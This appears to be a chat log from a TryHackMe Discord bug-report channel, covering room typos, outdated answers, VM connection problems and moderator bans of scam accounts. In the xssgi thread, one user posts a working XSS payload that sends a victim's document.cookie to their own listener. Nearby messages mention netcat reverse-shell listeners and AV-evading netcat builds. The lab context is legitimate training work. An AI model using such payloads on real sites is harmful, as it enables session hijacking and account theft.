Hey! I was working through the 'Encryption - Crypto 101' room, and I found an outdated answer on Task 8:
Question is "Who is TryHackMe's HTTPS certificate issued by?"
Old Answer: ||R3||
New Answer: ||E1||

and it has been checked by a lot of people and confirmed in #room-hints

shadow gets the same result on both their phone and ubuntu laptop both of which can be reasonably without doubt not have been man in the middled

Thank you @rugged canyon !

Gave +1 Rep to @rugged canyon

They're changing it but it's not consistent yet @wanton elk @rugged canyon

ah okay then

Got it, Thank you @eternal summit

guess it will be figured out over the next few days then

Gave +1 Rep to @trail marten

-ban @obsidian spruce -ddays 1 Game scam. Please secure your account and then appeal by emailing bans@tryhackme.com

@obsidian kiln Bot is on strike

🔨 Banned TanjirouKun#1424 indefinitely

This is just wrong, might be worth updating

Hi there

regarding
Buffer Overflow Prep room

i have tried several days and times to connect to the machine but seems there is a connectivity issue. Even if RDP succeeds, after a few minutes it disconnects....

That sounds distinctly like you might have multiple VPN connections open

Thanks for answerring

Gave +1 Rep to @obsidian kiln

Rebooted kali so far so good

Anyhelp on Room- Corp https://tryhackme.com/room/corp . Task3, Cant access the net to get kerb file so I rdpd to machine, created the file and ran in colors folder but get no answer, ie command does not give results

@slow frigate #room-hints please

in the Network Services room, task 7 (exploiting telnet)

for the question: What would the command look like for the listening port we selected in our payload?

It took the answer ||nc -lvp -4444|| but the actual answer is ||nc -lvp 4444||

this is such a small typo i wasnt sure if it was worth reporting, but here u go

well it is kinda obvious if you know how linux programs work and check the man page... and your typo will make the command not work at all if you actually try it

i agree, is why i wasnt sure it was worth calling out - thank you c:

Gave +1 Rep to @rugged canyon

also if you refresh the page after submitting an answer that it accepts it changes it to the real correct answer

It's not a bug, it's just answer tolerance. The longer the answer, the bigger the tolerance.

Makes sense thank you c:

Gave +1 Rep to @half quarry

the tolerance is the same (95%)

Prove it?

for longer answers, you have more room for error

that is, with 30 characters one or two can be wrong

with 5 characters every one has to be correct

#room-bugs message

😄

fake news

Ah, cause you can't.

Good to know Zeesh, good to know.

Therefore the longer the answer, the bigger the tolerance

Also, where did you get 95% from? 😆

Their backside.

an educated guess

also, fuq u

Bahahaha.

It starts with an "h"
well done ya muppet...

I'm 95% sure it can start with any letter you start laughing with.

See what I did there?

Did ya?

yes, proud of you for being a muppet

Nothing educated about it smh

I have the same issue... ||I have changed the source of netcat and compiled both 32bit and 64bit exe files. Both versions show up clean on virustotal but every payload seems to fail. I can execute a ping from the txt file and see the request hitting to my machine, if I tcpdump tun0 for icmp traffic.|| Did you get anywhere with this @dense garnet ?

Shoot me a PM (;

Thanks @dense garnet will have another play tomorrow

Gave +1 Rep to @dense garnet

I'm not 100% sure if this is a bug...

Room: https://tryhackme.com/room/linuxprivesc
Issue: ssh connection always shows error message (attached).

Solution found (https://askubuntu.com/questions/836048/ssh-returns-no-matching-host-key-type-found-their-offer-ssh-dss) shows added -oHostKeyAlgorithms=+ssh-dss works!

But now I'm up to Task 18 Passwords & Keys - SSH Keys and can't seem to make the ssh key work to connect...

fixed

fixed

Hi I have a problem. My room is BufferOverflow prep. I am not able to connect to win 7 vm using rdp.

Room: https://tryhackme.com/room/abusingwindowsinternals
T5
In Q1 you are asked to execute the dll-injector with the PID and the DLL path, but the dll-injector needs the process name to work.

Hi Muir

-ban @dreamy tusk -ddays Game scam -- compromised account

Ban <User:Mention/ID> [Reason:Text]

[-d d:Duration - Duration]
[-ddays ddays:Whole number - Delete Days]

Invalid arguments provided: "Game" is not a whole number

Oh, oops

-ban @dreamy tusk -ddays 1 Game scam -- compromised account

🔨 Banned Scooby#8556 indefinitely

Hello, both me and a colleague are having trouble accessing certain features within Smag Grotto

trying to access the admin.php, and it keeps hanging

Hi,

Room : https://tryhackme.com/room/malmalintroductory
Bug : Typo
Task : 12

In the sentence :

After import. Navigate to "View -> Imports"
There's an s appended to View -> Imports that should not be here.

Hello, I am in room Sysmon, when I start the machine and use Attackbox. It keeps opening Kali and not Window

That's for the attackbox

The target machine, Windows, won't use that button

It will use the button in the tasks

Nmap Post Port Scans, Task 5
ssh server never prompts for password, ends up hanging.
Debug log: https://pastebin.com/YDsyFPTE

i'm sorry, i have a question about the machine Gallery.... I try all the exploit but all failed... And i read all the walktgough and i set all correctly but i can't get root ... Maybe there is a bug?

...nevermind, my internet just sucks lol

...never nevermind that. It's some bug that happens in ubuntu 14.04, this command fixes it:
sudo ifconfig tun0 mtu 1200

huh, the more you know

meant 20.04, mb

and my machine

Does anyone have a bug with the MITRE room? I started the room two weeks ago. I came back to finish it and every link in the Task 5 redirect me to https://engage.mitre.org/ ...

Thank you for reporting. Will be updated. 🙂

Gave +1 Rep to @hearty mountain

Room: https://tryhackme.com/room/splunk201
Task 3 has a link to a private room.

On the REmux The Tmux room, task 4, i answered wrong on the first question(typed ctrl b , instead of ctrl b c) and it got accepted, when entering the second command which is "ctrl b ," i noticed this, refreshed the page and now it displays correctly so no issue in the end, just wanted to notify this

Same happened with the last 2 questions on task 4, it happens with this format i think

just entered ctrl or shift and added an 'a' and it got accepted, after refresh it corrects itselfs, don't know what's happening here

might also be because of screen cmd key using a

The windows event logs room advises to use examples 7 and 8 from the Microsoft Docs page, however, I think it should be 8 and 9. Microsoft must have updated the page at some stage. (answers blurred in case that breaks any rules).

Not a bug exactly but leads to a bit of confusion

https://tryhackme.com/room/windowseventlogs
https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.diagnostics/Get-WinEvent?view=powershell-7.1

You sure you are using the right pcap file? I just downloaded it and it matches

yeah i goofed, i thought it'd be one pcap for the whole of the room not multiple pcaps

sorry it was a bit confusing I have been working on a single pcap at uni today and needed some more learning on it

All good, not a problem

not sure if its a bug or not but on the room brainstorm, it says the answer 6 ports open but im only seeing 2 and from a quick search write ups say 2/3 aswell ?

Please can someone assist to decode this ID please. Source ID is 10ef60f0-3c9f-4b45-8e15-08da1318f608

@muted swallow is this a bug with a tryhackme room?

Ok, no it's not

Ok. Please don't spam the same question over a large number of channels, that's directly against the rules here.

Noted. Can you help me to decode it please.

Not in this channel.
What makes you think it's even decodable?
That was rhetorical. Please ask in #infosec-general and tell us a bit about it like why you're trying and where you got it.

-ban @honest moon -ddays 1 Your account has been compromised and is being used to send phishing scams. Please secure your account and then appeal this ban by emailing bans@tryhackme.com

🔨 Banned FiReKill#0201 indefinitely

Removed the reference until it goes public. Thanks for pointing it out.

Gave +1 Rep to @dense garnet

Hey, im trying to start https://tryhackme.com/room/introtox8664# however when i start the R2 VM for the first task, i dont get any User/pass info, so i'm unable to ssh to the vm through the vpn. Am i missing something?

Great thanks! Of course i only read the bullets. My bad.

Gave +1 Rep to @eternal summit

My #1 recommendation if you get stuck or you think you're missing some information is to re-read the task text

Am i missing something?
As a general rule, if you only read the bullet points, yes, you will always be missing stuff

Ill certainly do that now 🙂

Room: https://tryhackme.com/room/webosint has 2 questions under "Task 2" which is no longer accurate/or has been changed ever since the creation of the room

These are:

1. What is the first nameserver listed for the site?
2. What country is listed for the registrant?

I have not looked at the other tasks yet, so there might be some old stuff in them too

@gleaming shadow @queen sphinx @obsidian kiln

-ban @ember yew -ddays 1 Compromised account posting nitro scams. Please email bans@tryhackme.com when you have this fixed 🙂

🔨 Banned Kracken#8538 indefinitely

Ta @rotund burrow 🙂

https://tryhackme.com/room/pythonbasics, section "Introduction to Functions":

To get the flag, one has to output the value calculated, but it's not mentioned in the instructions. Only "output a message to alert you (via a print statement)."

Problem with Windows Fundamentals 3, Task 5. Had to check a write up, and it looks like the question had change but the answer didnt.

The original question asked the type of network it would be called, but now its asking for the type of firewall profile. Putting in the correct firewall profile is incorrect.

||Should be "public profile" not "public network"||

-ban @narrow oracle -ddays 1 Compromised account posting nitro scams. Please email bans@tryhackme.com when you have this fixed 🙂

🔨 Banned KIIIRA#2618 indefinitely

The images in Empire room Task 6- Stagers ( https://tryhackme.com/room/rppsempire ) doesnt load . Is this only for me . Can somebody check this

Are they imgur hosted?

Oh, no they're google. Not sure why they're broken but they're be broken for everyone cc @glad badger

Softlock on Linux Fundamentals Part 1 (impossible to complete)

Task 4 and 5 is impossible to complete. (I sent feedback on Task4)

Task4 question:
What is the username of who you're logged in as on your deployed Linux machine?

ANS: tryhackme

However, the machine I logged in is defaulted ROOT. (I guessed the flag!!)

You're accessing the wrong machine

more than likely, you logged into the attackbox

Ya I did thanks!! Machine is in task3!!

@gleaming shadow @icy elbow

-ban 922530431017037904 -ddays 1 Your account has been compromised by a nitro scam, please change your passwords and add mfa before emailing bans@tryhackme.com to get the ban revoked.

🔨 Banned where is my son !#6150 indefinitely

I really should macro that message'

I wanted to ask you guys if you don't have something automated for this 😄

Most yes but they're getting creative

yeah true

Not sure of typos belong here, but please tell if not.

https://tryhackme.com/room/wifihacking101
that they know the key instead of they

There is prob a bug on room Linux PrivESC

on task 1 you need to connect to a ssh server but its not connecting it says this:** Unable to negotiate with 10.10.105.206 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss**. i asked in Room-help somebody tried it too but it didn't work for him eather

You can solve this quite easily with some research

I'll fix this when I get back, thank you for reporting

Gave +1 Rep to @shrewd tangle

Done

In the https://tryhackme.com/room/zer0logon room Task 1 down in sources the first link is broken "Tom Tervoort of Secura - https://www.secura.com/pathtoimg.php?id=2055" also the Sources list is numbered 1. 1. 2.

@obsidian kiln

-ban @clever relic -ddays 1 Nitro Scam

🔨 Banned 3N354#0718 indefinitely

Remind me why you couldn't do that? 😆

Liquor

It amazes me that you think I'm sober smh

I am trying to do the WebOSINT room but I am at Task 2 - It seems the details I pull out do not match what they are asking for.. Has anyone ran into this?

Yep it seems the domain name details have changed and are no longer valid for the tasks.

@eternal summit How did you learn to be so good at hacking?

Dm me if you don’t want to publicly say

https://tryhackme.com/room/subdomainenumeration <-- In task 6 the first subdomain that is discovered isn't the correct answer (the first one is "api" not "delta")

It's Delta for me using the attackbox.

Also I used the "nameslist.txt" on the attackbox on my VM, and also came to the same results.

So whatever your word list is being used has api in the list.

I use the same wordlist only on my own freshly installed Kali with a fresh Seclist

How big is the word list?

Let me check

1,585,853 bytes

Yeah, the one you have is bigger than the one on the attackbox.

Alright, all good then 🙂

So it will more than likely have api in the word list.

I think Linux Fundamentals Part 3 might be broken.
Under Processes 101 it asks you to find a flag among processes running on the deployed instance.
I followed the video exactly, connecting to the instance via attack box and trying both "ps aux" and "ps aux | less" but still couldn't find the flag. Had to copy it off the video...

ps aux | grep should do it

It'll also depend on the width of your terminal iirc, especially if you use unfiltered outputs

it found a tryhackme+ process but i dont see the flag, no matter how wide i make the terminal (and rerun the command)

What did you grep for?

tried thm then THM then THM{PROCESSES}

ps aux | grep thm

like that ^

no " or anything

What user is your SSH session running as? What's the hostname of the box you're interacting with?

It may help to verify to provide this info, so you can send a screenshot

!docs verify

i dont know how to see that, i just started

Ok, verify with the bot and send a screenshot please

You can verify by following the steps in the link just above

Have you tried terminating and deploying the box again?

i closed and opened the terminal and reconnected to the instance, but i haven't tried terminating yet, wanted to check here in case i did something wrong before i go having to wait for it to load up again

ill go ahead and terminate now then

If you're concerned you're doing something wrong, and you've checked writeups, #room-help is the best place to ask

ok i see

but to clarify, in this case i wasnt right?

¯_(ツ)_/¯

ok restarted it and connected with ssh
I should try
ps aux | grep thm
?

well that gives same output as screenshot, no flag in sight

I'm starting the machine up

i did just ps aux

this time i found it

https://tryhackme.com/room/osqueryf8 <-- In Task 8 the number of features has changed since the room was published. It also looks like the referenced plugin "polylogyx" has been deprecated .

I had to go look at the readme history and find the year old documentation to answer the question correctly.

||Its currently 25 but the correct answer is 23||

-ban @lunar wadi -ddays 1 Nitro phishing. Please secure your account and then appeal this ban by emailing bans@tryhackme.com

🔨 Banned Hsehwag#9276 indefinitely

Dude i had the same prob with the browser's attackbox so currently i am using my VM with VPN and its working perfectly

I just wanted to report this room still has a bug

The bug is located at https://tryhackme.com/room/xssgi final challenge only can get my own cookies after waiting over 30 minutes lol

Theres a youtube video out there and it seems Im not the only one who has had this same bug. Also there needs to be a note to use HTTPS not http. There is no warning about that here

The room isn't bugged, the cookie catcher is borked.

You can catch the cookie using NC.

damn lol

I kept only getting my own cookies

Try using nc

What is your payload?

nc from attack box worked for me after trying via vpn a few times with same issue (only my cookie)

</textarea><script>fetch('http://10.0.2.15:8000?cookie=' + btoa(document.cookie) );</script>

I basically starting my own python web server

that ip is my vm's IP address

Are you using the attackbox?

No, you're own VM.

Nope I am using a vm

Try using a different port.

I know the attackbox already has a service running on port 8000

@gleaming shadow

I'll try it im sure its something silly

Try Changing the port to 9999

And using nc.

-ban 493027743802458112 -ddays 1 your account has been compromised by a nitro scam. Please change your passwords and add mfa before emailing bans@tryhackme.com

🔨 Banned Whisper#9600 indefinitely

Start the NC, run the payload and wait, it's usually 5-10 second(s)

+1 rep

❤️

It worked?

I didnt test it yet

earlier I gave up on it since I ttechnically made the exploit work

when I get thechance i might try it

I saw there was another solution sitting out there

I believe the new MISP room has a bugged VM attached.

Checking now. 🙂

Can you confirm its functioning again?

Make sure to connect through THM VPN or the browser on the AttackBox.

I am fully connected, when starting the room it is named TheHiveProject v2

Aah, that would be another issue. Let me check.

Please try again by redeploying the attached instance. 🙂

Bug on the room has been fixed. Please try again 🙂

Linux fundamentals part 1 I am doing exactly what the guy in the video is doing but it is not working. Anyone able to jump in voicechat to troubleshoot this?

There is bug in the room xssgi. No cookie is being sent to the attacker

ans is wrong

Works perfectly! Thanks!

Gave +1 Rep to @inland trail

+rep @glad badger too haha

+rep @glad badger

okay I'll stop haha

sorry for the pings xD

Thank you for reporting.
Now could you please also tell us what room that is, what you think the answer should be, why you think it's wrong, and anything else that would make that report actionable? 🙂

Oh it fixed thanks

The cookie catcher doesn't work, you can catch the cookie via netcat.

somehow it magically worked for shadow which feels like some amazing luck

Hi guys,
I've a problem on the room ZTH: Obscure Web Vulns for the task 18, when I insert my payload the service crash suddenly and I've to reboot the machine... however it's a simple JWT
Am I the only one in this situation ?
Thx

i tried with that also but it doesn't work

Good Day, I want to report a bug:

I wrote the last word "Protocol" with an "e" at the end, and the answer got accepted
room-link: https://tryhackme.com/room/httpindetail

that's answer tolerance, it accepts longer answers even if one or two characters are incorrect :)

Ok, 🙂

New CVE?

More likely Para cutting corners on the code

Para cutting corners?

I'll never forget that guy

Especially him and his box development mindset of "I'll never need to change this again so I'll just disable SSH"

I tell you my SSH debacle last time I tried to edit upload vulns?

TL;DR: I forgot the port knocking sequence to open it... 😂

Fortunately I keep good notes

Famous last words. 😄

Yes, thati s why I have left space for version numbers in vm titles these days

v226_CMN_MASTER_CLASS 😄

On net sec challenge how can I take the flag for the last question? I think i've tried everything and if I do a nmap scan at T5 the percentage doesn't even get up

I tried decoy, t1 , sF , sS , --mtu 8 and t0 nothing seems giving me anything

I second this, it doesn't work.

Hi, is the machine in "Exploit Vulnerabilities" room (/room/exploitingavulnerabilityv2) broken? I have started the machine but the web browser http://<given IP> does not open. Nmap port scan shows that port 80 is open and the room instruction says to wait minimum 5 minutes but it's been nearly 30 minutes and nothing is showing up. Is this an expected behaviour or is it a bug?

!docs verify